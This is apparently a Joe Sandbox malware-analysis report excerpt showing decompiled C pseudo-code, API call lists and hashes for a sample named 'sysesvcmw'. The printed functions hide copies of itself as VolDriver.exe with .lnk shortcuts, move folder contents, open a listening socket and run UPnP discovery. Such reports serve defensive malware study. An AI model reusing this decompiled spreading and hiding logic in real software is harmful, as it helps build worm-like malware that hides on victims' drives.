                                                                                                                                                                                                                                                                                    0x00405424
                                                                                                                                                                                                                                                                                    0x0040542a
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x00405460
                                                                                                                                                                                                                                                                                    0x00405438
                                                                                                                                                                                                                                                                                    0x00405446
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x00405322
                                                                                                                                                                                                                                                                                    0x00405466
                                                                                                                                                                                                                                                                                    0x0040547a
                                                                                                                                                                                                                                                                                    0x00405489
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405489

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00405610,?,?,?), ref: 00404FC8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404FFF
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040501F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040503F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040505F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405078
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00405088
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004050C1
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050DB
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050EC
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004050FF
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00405112
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 0040511F
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405137
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 0040514A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                                    • String ID: $QA$%s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 3833403615-723921974
                                                                                                                                                                                                                                                                                    • Opcode ID: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction ID: f358d4f12602216a8cf7219611423f3e74dfa0c58bc439e6418ed54077a909fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DD18175900218ABCB20DF60DC48FEA77B8FF44305F0485EAE609A6291D7B99BD4CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 468 404e80-404ecf CreateDirectoryW wsprintfW FindFirstFileW 469 404ed5-404ee9 lstrcmpW 468->469 470 404faf-404fb2 468->470 471 404f01 469->471 472 404eeb-404eff lstrcmpW 469->472 474 404f7c-404f92 FindNextFileW 471->474 472->471 473 404f03-404f4c wsprintfW * 2 472->473 476 404f66-404f76 MoveFileExW 473->476 477 404f4e-404f64 call 404e80 473->477 474->469 475 404f98-404fa9 FindClose RemoveDirectoryW 474->475 475->470 476->474 477->474
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404E80(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                                    				void* _v1120;
                                                                                                                                                                                                                                                                                    				short _v1644;
                                                                                                                                                                                                                                                                                    				short _v2164;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                                    				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                                    				_v1120 = _t29;
                                                                                                                                                                                                                                                                                    				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t14 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                                    						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							E00404E80( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                                    							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                                    				FindClose(_v1120);
                                                                                                                                                                                                                                                                                    				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x00404e8b
                                                                                                                                                                                                                                                                                    0x00404e8f
                                                                                                                                                                                                                                                                                    0x00404ea5
                                                                                                                                                                                                                                                                                    0x00404eab
                                                                                                                                                                                                                                                                                    0x00404ebc
                                                                                                                                                                                                                                                                                    0x00404ec2
                                                                                                                                                                                                                                                                                    0x00404ecf
                                                                                                                                                                                                                                                                                    0x00404fb2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ee9
                                                                                                                                                                                                                                                                                    0x00404f1a
                                                                                                                                                                                                                                                                                    0x00404f2a
                                                                                                                                                                                                                                                                                    0x00404f3a
                                                                                                                                                                                                                                                                                    0x00404f40
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f76
                                                                                                                                                                                                                                                                                    0x00404f4e
                                                                                                                                                                                                                                                                                    0x00404f5c
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f90
                                                                                                                                                                                                                                                                                    0x00404f9f
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(KT@,00000000), ref: 00404E8F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404EA5
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00404EBC
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041160C), ref: 00404EE1
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411610), ref: 00404EF7
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F1A
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F3A
                                                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404F76
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 00404F8A
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 00404F9F
                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00404FA9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$KT@
                                                                                                                                                                                                                                                                                    • API String ID: 92872011-1718218466
                                                                                                                                                                                                                                                                                    • Opcode ID: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction ID: f84c23499f796ae609c643b61d0d113fdbb715ac4c7aa211f5e11142a609d372
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 553145B5500218ABCB10DFA0DC88FDA7778BB88301F0085A9F709A6195DB79DAC4CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 660 40eb00-40eb12 call 408b00 663 40ec86-40ec8a 660->663 664 40eb18-40eb50 GetSystemInfo InitializeCriticalSection CreateEventA 660->664 665 40eb56-40eb69 CreateIoCompletionPort 664->665 666 40ec7f-40ec84 call 40e0e0 664->666 665->666 667 40eb6f-40eb79 call 40baf0 665->667 666->663 667->666 672 40eb7f-40eb97 WSASocketA 667->672 672->666 673 40eb9d-40ec00 setsockopt htons bind 672->673 673->666 674 40ec06-40ec18 listen 673->674 674->666 675 40ec1a-40ec25 WSACreateEvent 674->675 675->666 676 40ec27-40ec37 WSAEventSelect 675->676 676->666 677 40ec39-40ec3f 676->677 678 40ec41-40ec5d call 40bba0 677->678 679 40ec5f-40ec7e call 40bba0 677->679 678->679
                                                                                                                                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                                                                                                                                    			E0040EB00(void* __esi) {
                                                                                                                                                                                                                                                                                    				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                                    				short _v40;
                                                                                                                                                                                                                                                                                    				char _v77;
                                                                                                                                                                                                                                                                                    				short _v82;
                                                                                                                                                                                                                                                                                    				short _v86;
                                                                                                                                                                                                                                                                                    				short _v90;
                                                                                                                                                                                                                                                                                    				short _v92;
                                                                                                                                                                                                                                                                                    				short _v94;
                                                                                                                                                                                                                                                                                    				short _v96;
                                                                                                                                                                                                                                                                                    				short _v98;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				short _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = E00408B00(0x4c);
                                                                                                                                                                                                                                                                                    				_t54 = _t30;
                                                                                                                                                                                                                                                                                    				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t54 = 0x494f4350;
                                                                                                                                                                                                                                                                                    					GetSystemInfo( &_v36);
                                                                                                                                                                                                                                                                                    					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                                    					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                                    					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                                    					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                                    					if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                                                                    						E0040E0E0(_t54);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = E0040BAF0(_t45);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v77 = 1;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                                                                                                                                                                                                                    					_v94 = 0;
                                                                                                                                                                                                                                                                                    					_v90 = 0;
                                                                                                                                                                                                                                                                                    					_v86 = 0;
                                                                                                                                                                                                                                                                                    					_v82 = 0;
                                                                                                                                                                                                                                                                                    					_t39 = _v40;
                                                                                                                                                                                                                                                                                    					_v96 = 2;
                                                                                                                                                                                                                                                                                    					_v92 = _t39;
                                                                                                                                                                                                                                                                                    					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                                    					_v98 = _t39;
                                                                                                                                                                                                                                                                                    					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                                    					__imp__#2(_t40,  &_v100, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t56 = 0;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EA30, _t54, 0, 0);
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E400, _t54, 0, 0);
                                                                                                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                                                    0x0040eb06
                                                                                                                                                                                                                                                                                    0x0040eb0b
                                                                                                                                                                                                                                                                                    0x0040eb0d
                                                                                                                                                                                                                                                                                    0x0040eb12
                                                                                                                                                                                                                                                                                    0x0040ec8a
                                                                                                                                                                                                                                                                                    0x0040eb18
                                                                                                                                                                                                                                                                                    0x0040eb1d
                                                                                                                                                                                                                                                                                    0x0040eb23
                                                                                                                                                                                                                                                                                    0x0040eb29
                                                                                                                                                                                                                                                                                    0x0040eb2d
                                                                                                                                                                                                                                                                                    0x0040eb34
                                                                                                                                                                                                                                                                                    0x0040eb37
                                                                                                                                                                                                                                                                                    0x0040eb45
                                                                                                                                                                                                                                                                                    0x0040eb4b
                                                                                                                                                                                                                                                                                    0x0040eb50
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec84
                                                                                                                                                                                                                                                                                    0x0040eb5e
                                                                                                                                                                                                                                                                                    0x0040eb64
                                                                                                                                                                                                                                                                                    0x0040eb69
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb6f
                                                                                                                                                                                                                                                                                    0x0040eb74
                                                                                                                                                                                                                                                                                    0x0040eb79
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb8b
                                                                                                                                                                                                                                                                                    0x0040eb91
                                                                                                                                                                                                                                                                                    0x0040eb97
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ebac
                                                                                                                                                                                                                                                                                    0x0040ebb1
                                                                                                                                                                                                                                                                                    0x0040ebbd
                                                                                                                                                                                                                                                                                    0x0040ebc1
                                                                                                                                                                                                                                                                                    0x0040ebc5
                                                                                                                                                                                                                                                                                    0x0040ebc9
                                                                                                                                                                                                                                                                                    0x0040ebce
                                                                                                                                                                                                                                                                                    0x0040ebd8
                                                                                                                                                                                                                                                                                    0x0040ebdd
                                                                                                                                                                                                                                                                                    0x0040ebe1
                                                                                                                                                                                                                                                                                    0x0040ebed
                                                                                                                                                                                                                                                                                    0x0040ebf2
                                                                                                                                                                                                                                                                                    0x0040ebf7
                                                                                                                                                                                                                                                                                    0x0040ec00
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec0f
                                                                                                                                                                                                                                                                                    0x0040ec18
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec1a
                                                                                                                                                                                                                                                                                    0x0040ec20
                                                                                                                                                                                                                                                                                    0x0040ec25
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec2e
                                                                                                                                                                                                                                                                                    0x0040ec37
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec3a
                                                                                                                                                                                                                                                                                    0x0040ec3f
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec51
                                                                                                                                                                                                                                                                                    0x0040ec56
                                                                                                                                                                                                                                                                                    0x0040ec57
                                                                                                                                                                                                                                                                                    0x0040ec5a
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec6f
                                                                                                                                                                                                                                                                                    0x0040ec7e
                                                                                                                                                                                                                                                                                    0x0040ec7e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 0040EB23
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EB37
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EB45
                                                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EB5E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BAF0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BB0E
                                                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EB8B
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EBB1
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040EBE1
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040EBF7
                                                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040EC0F
                                                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040EC1A
                                                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EC2E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f5c8a733228a7b3742c1c3b1f999116d73948f9746cd990c91c1e4c648286908
                                                                                                                                                                                                                                                                                    • Instruction ID: 55e3d3791406c7558891e3ce563330e9b7b343d865a5bfb51454dd4e2dcce5d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5c8a733228a7b3742c1c3b1f999116d73948f9746cd990c91c1e4c648286908
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65419270644302BBE3209F758C4AF46B7A5BF44710F108A2AF568E62D0E7B5E454CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
